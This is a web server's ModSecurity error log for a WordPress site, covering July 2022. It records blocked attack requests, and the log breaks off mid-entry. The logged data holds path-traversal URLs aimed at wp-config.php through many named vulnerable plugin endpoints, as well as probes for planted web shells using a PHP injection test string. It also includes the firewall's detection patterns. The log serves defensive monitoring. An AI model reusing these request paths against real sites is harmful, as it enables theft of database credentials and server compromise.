[client 20.11.48.43:52804] [client 20.11.48.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YtS686LWQnX2wkKmiHdZgAAAAME"] [Sun Jul 17 20:44:20.021808 2022] [:error] [pid 23213:tid 139778938844928] [client 20.11.48.43:52806] [client 20.11.48.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "YtS69JvAUk9ZfhiEfBMmmAAAABE"] [Sun Jul 17 20:44:20.022934 2022] [:error] [pid 23213:tid 139778938844928] [client 20.11.48.43:52808] [client 20.11.48.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "YtS69JvAUk9ZfhiEfBMmmQAAABE"] [Sun Jul 17 20:44:20.178139 2022] [:error] [pid 23213:tid 139778880096000] [client 20.11.48.43:52810] [client 20.11.48.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "YtS69JvAUk9ZfhiEfBMmmgAAABg"] [Mon Jul 18 04:05:15.769298 2022] [autoindex:error] [pid 3193:tid 140438134957824] [client 20.39.191.252:39720] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jul 18 20:19:01.063276 2022] [autoindex:error] [pid 3192:tid 140437989852928] [client 193.233.177.202:37880] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jul 18 20:22:18.923428 2022] [autoindex:error] [pid 3192:tid 140438023423744] [client 193.233.177.202:37986] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jul 19 06:19:30.360095 2022] [:error] [pid 7709:tid 139978906474240] [client 193.201.9.12:55058] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache.php"] [unique_id "YtaTQuNJePveYS20-v8CFwAAAM8"] [Tue Jul 19 06:19:32.299338 2022] [:error] [pid 7177:tid 139978948437760] [client 193.201.9.12:55060] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache.php"] [unique_id "YtaTRO5ZsO8JLAcPXbcfbAAAAEo"] [Tue Jul 19 06:19:34.888971 2022] [:error] [pid 7709:tid 139978847725312] [client 193.201.9.12:55062] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache.php"] [unique_id "YtaTRuNJePveYS20-v8CGAAAANY"] [Tue Jul 19 13:00:56.669940 2022] [:error] [pid 7177:tid 139978982008576] [client 132.145.9.189:57254] [client 132.145.9.189] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "YtbxWO5ZsO8JLAcPXbch8QAAAEY"] [Tue Jul 19 21:26:14.505013 2022] [:error] [pid 10789:tid 140355521419008] [client 193.201.9.12:46660] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/shell20211028.php"] [unique_id "YtdnxuPZVx2mKlXlGp4ajgAAANU"] [Tue Jul 19 21:26:15.160128 2022] [:error] [pid 10616:tid 140355538204416] [client 193.201.9.12:46664] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/shell20211028.php"] [unique_id "Ytdnx95F_ooMZvLXtFScLQAAABM"] [Tue Jul 19 21:26:15.567722 2022] [:error] [pid 10617:tid 140355504633600] [client 193.201.9.12:46666] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/shell20211028.php"] [unique_id "Ytdnx2hJwk4Xn3y0V43wMAAAAFc"] [Wed Jul 20 05:32:14.039096 2022] [autoindex:error] [pid 19583:tid 139984401008384] [client 37.19.195.135:53558] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jul 20 11:30:16.580556 2022] [:error] [pid 19583:tid 139984392615680] [client 198.204.249.10:33382] [client 198.204.249.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "YtgtmMVHqy-AcWDlh7OKGgAAAFY"] [Wed Jul 20 11:30:16.767850 2022] [:error] [pid 19582:tid 139984620193536] [client 198.204.249.10:33384] [client 198.204.249.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "YtgtmEZU7pKFKMecLphlIwAAAAM"] [Wed Jul 20 11:30:16.954841 2022] [:error] [pid 19584:tid 139984636978944] [client 198.204.249.10:33386] [client 198.204.249.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "YtgtmOFvnCNokZ3PidlsgAAAAIE"] [Wed Jul 20 11:30:17.146213 2022] [:error] [pid 19582:tid 139984526898944] [client 198.204.249.10:33388] [client 198.204.249.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php"] [unique_id "YtgtmUZU7pKFKMecLphlJAAAAAY"] [Wed Jul 20 11:30:17.208664 2022] [:error] [pid 20182:tid 139984459757312] [client 198.204.249.10:33390] [client 198.204.249.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/w3-total-cache/pub/sns.php?message=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "YtgtmTljCyuwUH-gVYfceAAAAM4"] [Wed Jul 20 11:30:17.344617 2022] [:error] [pid 19584:tid 139984476542720] [client 198.204.249.10:33392] [client 198.204.249.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "YtgtmeFvnCNokZ3PidlsgQAAAIw"] [Wed Jul 20 14:07:27.549196 2022] [:error] [pid 4681:tid 140454547699456] [client 193.201.9.12:39094] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/sistem.php"] [unique_id "YthSb0j65Qdlq2moIyWLwQAAAEE"] [Wed Jul 20 14:07:28.889880 2022] [:error] [pid 4682:tid 140454356023040] [client 193.201.9.12:39096] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/sistem.php"] [unique_id "YthScFy_MCGA5i5vIlkKwQAAAI8"] [Wed Jul 20 14:07:30.188151 2022] [:error] [pid 4682:tid 140454330844928] [client 193.201.9.12:39098] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/sistem.php"] [unique_id "YthScly_MCGA5i5vIlkKwgAAAJI"] [Thu Jul 21 05:18:39.373416 2022] [:error] [pid 15071:tid 139906009495296] [client 193.201.9.12:60044] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/class-wp-page-icon.php"] [unique_id "Ytkn_wG5q-nz3udSQ8ry6gAAAEs"] [Thu Jul 21 05:18:45.412512 2022] [:error] [pid 15071:tid 139905984317184] [client 193.201.9.12:60046] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match 